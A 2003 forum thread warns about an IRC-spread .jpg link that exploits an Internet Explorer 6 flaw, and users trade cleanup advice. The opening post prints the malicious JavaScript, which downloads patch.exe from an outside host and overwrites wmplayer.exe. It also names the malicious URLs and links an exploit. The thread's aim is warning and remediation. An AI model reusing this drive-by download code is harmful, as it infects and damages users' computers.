Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

.JPG Ie 6/Media Player virus

  • 26-10-2003 1:37pm
    #1
    Registered Users, Registered Users 2 Posts: 849 ✭✭✭


    there seems to be a url floating around IRC

    DO NOT CLICK ON IT

    http://www.angelfire.xxx/celeb2/picsx/britney.jpg

    it is using an exploit that swaps the Windows Media Player with a message from Mindlock by making use of the Internet Explorer 6 XML bypass flaw

    Related advisory:
    http://packetstormsecurity.nl/0310-advisories/IE6XMLbypass.txt

    Working example:
    http://packetstormsecurity.nl/0310-exploits/wmpphp.txt

    The guy who wrote this encoded the top 9 lines of the file to make it look like normal(ish) page, the encoded lines match the above example. code:

    [PHP]
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://scavenger.sharewith.us(dontclick)/patch.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3; s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
    [/PHP]

    It downloads a file from http://scavenger.sharewith.us(dontclick)/patch.exe (This site has been suspended.)
    Someone pointed out that the virus written in Delphi.

    Quick fix is to remove C:\\Program Files\\Windows Media Player\\wmplayer.exe and do all the norm stuff like remove it from msconfig

    Some people have reported that after infection (on reboot) it removes system files and a format & reinstall or a repar has to be done.

    watch out for .jpg links on irc, id say it will pop back up soon enough when they find a new host.


Comments

  • Registered Users, Registered Users 2 Posts: 3,216 ✭✭✭phreak


    i have the virus and now i can't even start windows... anyone know a way to fix it without a format?


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    run a repair ?


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    I may have gotten it, and as it only seems to affect wmplayer.exe, I've done the following :-

    1. Deleted the Windows Media Player executable
    C:\Program Files\Windows Media Player\wmplayer.exe

    2. Run the Windows Media Player Setup Wizard
    C:\Program Files\Windows Media Player\setup_wm.exe

    (This downloads any Windows Media Player components you don't have and reinstalls the application)

    Hope it's that simple.


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    check your msconfig & services 2


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    Originally posted by Cr8or
    check your msconfig & services 2

    Can you be more specific? What are we looking for in Services in MSCONFIG?


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    anything that shouldn't be there .. I haven't been infected so I duno how it boots with the system ... look for suspicious name id say ... for services tick the don't display Microsoft services check box in msconfig this should shorten down the list a bit.


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    I disabled one startup item, the only one with %systemroot% in
    the command line...

    "%systemroot%\system32\dumprep 0 -k"


    Didn't remember having seen it before...


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or




  • Closed Accounts Posts: 3,299 ✭✭✭oeNeo


    Is there a way to find out for sure if you have this? I'm just after clicking some .jpg in irc and it opened WMP in the browser. Just now I've discovered IXPLORE.exe in msconfig and ZA is asking me whether I want it to access the interweb. I said no obviously so maybe it hasn't downloaded the actual virus yet?

    I've deleted the WMP.exe and am in the process of running a virus scan.


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    there are a few going around remove IXPLORE.exe (prob some sort of backdoor)

    also send it into symantec & your av company (its always nice to help)


  • Advertisement
  • Closed Accounts Posts: 3,299 ✭✭✭oeNeo


    The one I clicked was won.attaq.net with lol.jpg at the end.

    http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749

    Vielen Dank to cr8or for his help.


Advertisement